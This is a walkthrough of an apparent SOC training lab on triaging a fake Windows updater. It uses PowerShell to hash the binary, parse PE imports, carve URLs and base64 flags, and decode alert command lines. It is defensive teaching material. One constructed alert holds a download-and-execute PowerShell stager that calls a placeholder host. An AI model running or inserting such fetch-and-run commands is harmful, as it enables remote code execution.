
Shadow Trace

J

Software Developer | Learning Cybersecurity | Open for roles *

If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.

It’s the graveyard shift, and you’re the lone analyst in the SOC when an urgent call comes in: a user’s machine dropped a suspicious binary named windows-update.exe. At first glance, it masquerades as a routine updater, but alerts from the EDR and oddities in the file contents suggest something far more sinister. This exercise places you in that real-world pressure cooker: triage fast, collect reliable indicators, and decide whether to escalate or contain.

Throughout this lab, you’ll practice core SOC triage workflows—static binary inspection, IOC extraction, and alert correlation—while answering targeted questions that mirror daily incident-response tasks. By the end, you’ll be able to identify network IOCs, compute and record file hashes, read process-level triggers, and translate encoded artifacts into actionable intelligence. Think of it as hands-on experience for the moment when speed, precision, and context matter most.

Scenario

It’s the middle of the night shift. You’re the only analyst in the SOC when a manager calls in urgently: a suspicious file was found on a user's machine and needs immediate review.

You open the file and start digging. Something doesn’t look normal for a company updater, and at the same time, the EDR throws a couple of alerts.

Your task: analyse the file, collect anything to identify it, gather any potential IOCs, correlate and analyse the alerts for potential malicious behaviour. It’s up to you to piece together what’s happening before it spreads further.

Learning Objectives

  • Extract IOCs from suspicious binaries

  • Correlate alerts with malicious activity

  • Perform basic SOC triage actions

Prerequisites

Follow the instructions for the next tasks to start.

File analysis

Analyse the binary located at C:\Users\DFIRUser\Desktop\windows-update.exe on the attached machine and answer the questions below.

Start the lab by clicking the Start Machine button. It will take around 2 minutes to load properly. The VM will be accessible on the right side of the split screen.

Several tools that can help with any kind of analysis are installed on the machine under C:\Users\DFIRUser\DFIR Tools.

Answer the questions below

  1. What is the architecture of the binary file windows-update.exe?

    sigcheck.exe C:\Users\DFIRUser\Desktop\windows-update.exe

    Read the MachineType line of the output; sigcheck takes it from the Machine field of the PE file header, not from the file name.

  2. What is the hash (sha-256) of the file windows-update.exe?

    Get-FileHash -Algorithm SHA256 "C:\Users\DFIRUser\Desktop\windows-update.exe"

  3. Identify the URL within the file to use it as an IOC

     $bytes = Get-Content -Path "C:\Users\DFIRUser\Desktop\windows-update.exe" -Encoding Byte
     $text  = [System.Text.Encoding]::ASCII.GetString($bytes)
     [regex]::Matches($text, 'https?://[^\s"''<>\\]+') | ForEach-Object { $_.Value } | Sort-Object -Unique

    This only sees narrow (ASCII) strings. If nothing comes back, the URL may be stored as a wide (UTF-16LE) string; strings.exe from the DFIR Tools folder carves both encodings by default. On PowerShell 7 the -Encoding Byte switch no longer exists and -AsByteStream is used instead.

  4. With the URL identified, can you spot a domain that can be used as an IOC?

    strings "C:\Users\DFIRUser\Desktop\windows-update.exe" | findstr /i ".com"

    Record the host name without scheme or path, and defang it (example[.]com) in any ticket or report so nobody clicks it.

  5. Input the decoded flag from the suspicious domain

    The suspicious domain/URL carries a base64 token; decode that token to plain text (CyberChef's "From Base64" is enough) to get the flag.

  6. What library related to socket communication is loaded by the binary?

    Search the SHA-256 from question 2 on VirusTotal (a hash lookup does not upload the sample, which matters if the file could contain internal data) and read the imported DLLs under the Details tab; the Winsock library is among them. The same list can be read offline from the PE import table, which avoids touching any external service during triage.
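The questions on architecture and imported libraries can be answered without sigcheck or VirusTotal by reading the PE headers directly. The following is an added example, not part of the lab or of this write-up; it assumes the file path the lab uses and the standard PE layout (IMAGE_FILE_HEADER, IMAGE_OPTIONAL_HEADER, section table, IMAGE_IMPORT_DESCRIPTOR), and it also reports the SHA-256 so the three static facts land in one object you can paste into a ticket.

```powershell
# Added example (not part of the lab or this write-up): answer the "architecture"
# and "socket library" questions offline by parsing the PE headers, instead of
# trusting the file name or a web lookup. Works on any PE file; the path at the
# bottom is the one the lab uses.
function Get-PeSummary {
    param([Parameter(Mandatory)][string]$Path)

    $b = [System.IO.File]::ReadAllBytes($Path)
    if ($b.Length -lt 0x40 -or $b[0] -ne 0x4D -or $b[1] -ne 0x5A) {
        throw "$Path does not start with the MZ magic; not a Windows executable"
    }

    # e_lfanew (DOS header offset 0x3C) points to the "PE\0\0" signature.
    $pe = [BitConverter]::ToInt32($b, 0x3C)
    if ([BitConverter]::ToUInt32($b, $pe) -ne 0x00004550) { throw "PE signature not found" }

    # IMAGE_FILE_HEADER follows the signature: Machine (WORD) at +0,
    # NumberOfSections at +2, SizeOfOptionalHeader at +16.
    $fh          = $pe + 4
    $machine     = [BitConverter]::ToUInt16($b, $fh)
    $numSections = [BitConverter]::ToUInt16($b, $fh + 2)
    $optSize     = [BitConverter]::ToUInt16($b, $fh + 16)
    $arch = switch ($machine) {
        0x014C  { 'x86 (32-bit)' }
        0x8664  { 'x64 (AMD64)' }
        0xAA64  { 'ARM64' }
        default { 'unknown (0x{0:X4})' -f $machine }
    }

    # IMAGE_OPTIONAL_HEADER: Magic distinguishes PE32 (0x10B) from PE32+ (0x20B),
    # which moves the data directory array from +96 to +112.
    $opt    = $fh + 20
    $magic  = [BitConverter]::ToUInt16($b, $opt)
    $dirOff = if ($magic -eq 0x20B) { $opt + 112 } else { $opt + 96 }
    # Data directory index 1 is the import table; each entry is (RVA, Size), 4 bytes each.
    $importRva = [BitConverter]::ToUInt32($b, $dirOff + 8)

    # Section table (40-byte entries right after the optional header) is what lets
    # us convert the RVAs in the import table into raw file offsets.
    $secTable = $opt + $optSize
    $sections = for ($i = 0; $i -lt $numSections; $i++) {
        $s = $secTable + 40 * $i
        [pscustomobject]@{
            VirtSize = [BitConverter]::ToUInt32($b, $s + 8)
            VirtAddr = [BitConverter]::ToUInt32($b, $s + 12)
            RawSize  = [BitConverter]::ToUInt32($b, $s + 16)
            RawPtr   = [BitConverter]::ToUInt32($b, $s + 20)
        }
    }
    $rvaToOffset = {
        param([uint32]$rva)
        foreach ($sec in $sections) {
            $span = [Math]::Max($sec.VirtSize, $sec.RawSize)
            if ($rva -ge $sec.VirtAddr -and $rva -lt ($sec.VirtAddr + $span)) {
                return [int]($rva - $sec.VirtAddr + $sec.RawPtr)
            }
        }
        throw ('RVA 0x{0:X} is outside every section (packed or truncated file?)' -f $rva)
    }

    # Walk IMAGE_IMPORT_DESCRIPTOR entries (20 bytes each; Name RVA at +12) until the
    # all-zero terminator. A packed sample usually shows only the packer's own
    # imports here, which is itself a finding worth noting.
    $dlls = @()
    if ($importRva -ne 0) {
        $d = & $rvaToOffset $importRva
        while ([BitConverter]::ToUInt32($b, $d + 12) -ne 0) {
            $n   = & $rvaToOffset ([BitConverter]::ToUInt32($b, $d + 12))
            $end = [Array]::IndexOf($b, [byte]0, $n)
            $dlls += [Text.Encoding]::ASCII.GetString($b, $n, $end - $n)
            $d += 20
        }
    }

    [pscustomobject]@{
        File         = $Path
        SHA256       = (Get-FileHash -Algorithm SHA256 -Path $Path).Hash
        Architecture = $arch
        Format       = if ($magic -eq 0x20B) { 'PE32+' } else { 'PE32' }
        Imports      = $dlls
        # Winsock (ws2_32.dll / wsock32.dll) is the socket-level library; wininet and
        # winhttp sit above it and are worth flagging as well.
        SocketDlls   = @($dlls | Where-Object { $_ -match '^(ws2_32|wsock32)\.dll$' })
        HttpDlls     = @($dlls | Where-Object { $_ -match '^(wininet|winhttp)\.dll$' })
    }
}

Get-PeSummary -Path 'C:\Users\DFIRUser\Desktop\windows-update.exe' | Format-List
```

If SocketDlls comes back empty but the sample clearly talks to the network, the import table is probably being populated at run time (a packer or manual LoadLibrary/GetProcAddress), which is a stronger reason to escalate than a clean-looking import list is a reason to close the alert.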
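The URL, domain and base64 steps above are three one-liners that each miss something: the ASCII-only decode never sees wide (UTF-16LE) strings, and the base64 has to be spotted and decoded by hand. The block below is an added example, not part of the lab or of this write-up, that carves both encodings, extracts URLs and hosts, tries to decode any base64-looking token, and produces defanged copies for the ticket. The sample bytes at the bottom are constructed (example.com / example.net hosts and a flag{constructed} token); the commented-out last line runs the same function against the lab file.

```powershell
# Added example (not part of the lab or this write-up).
function ConvertFrom-Base64Lenient {
    param([Parameter(Mandatory)][string]$Token)
    $t = $Token.TrimEnd('=')
    if ($t.Length % 4 -eq 1) { return $null }              # no valid base64 has this length
    $t = $t.PadRight($t.Length + ((4 - $t.Length % 4) % 4), '=')
    try {
        $text = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($t))
        # Keep only decodings that are printable text; random tokens almost never are.
        if ($text -match '^[\x20-\x7E\r\n\t]+$') { return $text }
    } catch { }
    return $null
}

function Get-BinaryIocs {
    param([Parameter(Mandatory)][byte[]]$Bytes, [int]$MinLength = 6)
    $run = "[\x20-\x7E]{$MinLength,}"

    # Narrow strings: Latin-1 maps every byte to exactly one char, so nothing is dropped.
    $ascii = [regex]::Matches([Text.Encoding]::GetEncoding(28591).GetString($Bytes), $run) | ForEach-Object Value
    # Wide strings: decode as UTF-16LE at both byte alignments so odd-offset strings are found.
    $wide = foreach ($off in 0, 1) {
        $len = $Bytes.Length - $off
        if ($len -ge 2) {
            $s = [Text.Encoding]::Unicode.GetString($Bytes, $off, $len - ($len % 2))
            [regex]::Matches($s, $run) | ForEach-Object Value
        }
    }
    $strings = @($ascii) + @($wide) | Where-Object { $_ } | Sort-Object -Unique

    $urls  = $strings | ForEach-Object { [regex]::Matches($_, 'https?://[^\s"''<>\\]+') } |
             ForEach-Object Value | Sort-Object -Unique
    $hosts = $urls | ForEach-Object { try { ([uri]$_).Host } catch { } } | Sort-Object -Unique

    # Base64 candidates: URL path segments (so a '/' inside a URL is not mistaken for
    # part of the token) plus any run of base64 characters inside the carved strings.
    $candidates = @($urls | ForEach-Object { try { ([uri]$_).Segments } catch { } } | ForEach-Object { $_.Trim('/') }) +
                  @($strings | ForEach-Object { $_ -split '[^A-Za-z0-9+/=]+' })
    $decoded = $candidates | Where-Object { $_ -match '^[A-Za-z0-9+/]{12,}={0,2}$' } | Sort-Object -Unique |
               ForEach-Object { $p = ConvertFrom-Base64Lenient $_; if ($p) { [pscustomobject]@{ Token = $_; Plaintext = $p } } }

    [pscustomobject]@{
        StringCount = @($strings).Count
        Urls        = @($urls)
        Domains     = @($hosts)
        # Defanged copies are what goes into the ticket or intel share, never clickable ones.
        Defanged    = @($urls | ForEach-Object { ($_ -replace '^http', 'hxxp') -replace '\.', '[.]' })
        Base64      = @($decoded)
    }
}

# Constructed sample: an ASCII URL whose last path segment is base64, a few bytes of
# binary noise, then a UTF-16LE URL that the ASCII-only carve would never show.
$sample = [byte[]](
    [Text.Encoding]::ASCII.GetBytes("MZ....`0http://updates.example.com/ZmxhZ3tjb25zdHJ1Y3RlZH0=`0") +
    [byte[]](0x00, 0x7F, 0xFF, 0xFE, 0x01, 0x00) +
    [Text.Encoding]::Unicode.GetBytes("https://c2.example.net/check`0")
)
Get-BinaryIocs -Bytes $sample | Format-List

# Against the lab file:
# Get-BinaryIocs -Bytes ([IO.File]::ReadAllBytes('C:\Users\DFIRUser\Desktop\windows-update.exe')) | Format-List
```

On the constructed sample, Domains lists both hosts (the second only because of the UTF-16LE pass) and Base64 shows the single token that decodes to printable text; the "com/Zmxh..." fragment that the naive split also produces is rejected because its decoding is not printable.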

Alerts Analysis

Click on the View Site button attached to this task to display the static site in split view. Review the alerts and answer the questions below.

Alternatively, if you can not see all the columns in split view, you can open the static site in full screen by clicking the Interactive Exercise link in the task.

Answer the questions below

For this section you need to recognise which encoding each alert uses and have a quick way to turn it back into plain text to find the expected answer. Personally, I used CyberChef and online Base64 decoders. One caveat worth knowing when a powershell.exe command line carries -EncodedCommand (or its -enc/-e short forms): that payload is base64 of UTF-16LE text, so a decoder that assumes UTF-8 shows a NUL between every character; decode the bytes as UTF-16LE and the script reads normally.

  1. Can you identify the malicious URL from the trigger by the process powershell.exe?

  2. Can you identify the malicious URL from the alert triggered by chrome.exe?

  3. What's the name of the file saved in the alert triggered by chrome.exe?

    The file name appears verbatim in the chrome.exe command line shown in the alert.
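Pulling the URL, the domain and the saved-file name out of a process alert is the same three regexes every time, with one extra step for powershell.exe: decode -EncodedCommand first and search the plaintext as well. The block below is an added example, not part of the lab or of this write-up. The two alerts it runs on are constructed (example.com / example.net hosts; the chrome.exe one uses headless Chrome's real --print-to-pdf switch so that a written file appears on the command line); the lab's real alerts will differ, and the functions are meant to be pointed at whatever command-line column your alert export has.

```powershell
# Added example (not part of the lab or this write-up).
function Expand-EncodedCommand {
    param([Parameter(Mandatory)][string]$CommandLine)
    # powershell.exe accepts -EncodedCommand (also -e, -ec, -enc) followed by base64 of
    # the script as UTF-16LE. Decoding it as UTF-8 shows a NUL between every character,
    # which is the usual reason online decoders look "broken" on these.
    $m = [regex]::Match($CommandLine, '(?i)[-/](?:encodedcommand|encoded|enc|ec|e)\s+([A-Za-z0-9+/=]+)')
    if (-not $m.Success) { return $null }
    try { [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value)) }
    catch { $null }
}

function Get-AlertIocs {
    param([Parameter(Mandatory)][string]$Process, [Parameter(Mandatory)][string]$CommandLine)

    $decoded = Expand-EncodedCommand -CommandLine $CommandLine
    $text = if ($decoded) { $CommandLine + "`n" + $decoded } else { $CommandLine }

    $urls = @([regex]::Matches($text, 'https?://[^\s"''<>)]+') | ForEach-Object Value | Sort-Object -Unique)
    # Windows paths that end in an extension. The launched binary itself is filtered out so
    # only files the command reads or writes remain. Paths containing spaces are only caught
    # when the alert source quotes them, so treat an empty result as "check by hand".
    $pathRe = '(?i)[A-Z]:\\(?:[^\\\s"''<>|]+\\)*[^\\\s"''<>|]+\.[a-z0-9]{1,5}'
    $files  = @([regex]::Matches($text, $pathRe) | ForEach-Object Value | Sort-Object -Unique |
                Where-Object { $_ -notmatch ('\\' + [regex]::Escape($Process) + '$') })

    [pscustomobject]@{
        Process = $Process
        Decoded = $decoded
        Urls    = $urls
        Domains = @($urls | ForEach-Object { try { ([uri]$_).Host } catch { } } | Sort-Object -Unique)
        Files   = $files
    }
}

# Constructed alerts. The powershell.exe one is built from a plaintext stager so the
# encoded form is exactly what powershell.exe would accept; the chrome.exe one writes
# a file with --print-to-pdf, which is where the "file saved" answer comes from.
$stager  = "IEX (New-Object Net.WebClient).DownloadString('http://updates.example.com/stage.ps1')"
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($stager))
$alerts  = @(
    [pscustomobject]@{ Process = 'powershell.exe'; CommandLine = "powershell.exe -NoP -W Hidden -Enc $encoded" }
    [pscustomobject]@{ Process = 'chrome.exe';     CommandLine = '"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --print-to-pdf=C:\Users\Public\invoice.pdf https://files.example.net/invoice' }
)
$alerts | ForEach-Object { Get-AlertIocs -Process $_.Process -CommandLine $_.CommandLine } | Format-List
```

For the first alert the URL only exists inside the decoded script, which is the point of decoding before searching; for the second, Urls holds the download location and Files the invoice.pdf path written to disk, the two pieces a containment request (block the domain, sweep for the file) needs.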

This exercise reinforces the essentials of early-stage incident response: verify file provenance, extract trustworthy indicators from binaries, and correlate telemetry from endpoints and network sensors to form a coherent hypothesis. A malicious-looking updater can quickly turn into a lateral propagation or data-exfiltration incident if missed—so collecting SHA-256 hashes, embedded URLs, imported libraries (like Winsock), and related process activity isn’t optional, it’s critical.

Beyond the technical checks, the most valuable outcome is practice: the ability to triage under pressure, prioritize containment (isolate host, block domain/IP, collect artifacts), and document findings for escalation. With the IOCs and alerts from this lab, you’re equipped to drive a defensible response—submit artifacts to intel platforms, update detection rules, and harden controls so the next “fake update” fails to find purchase.
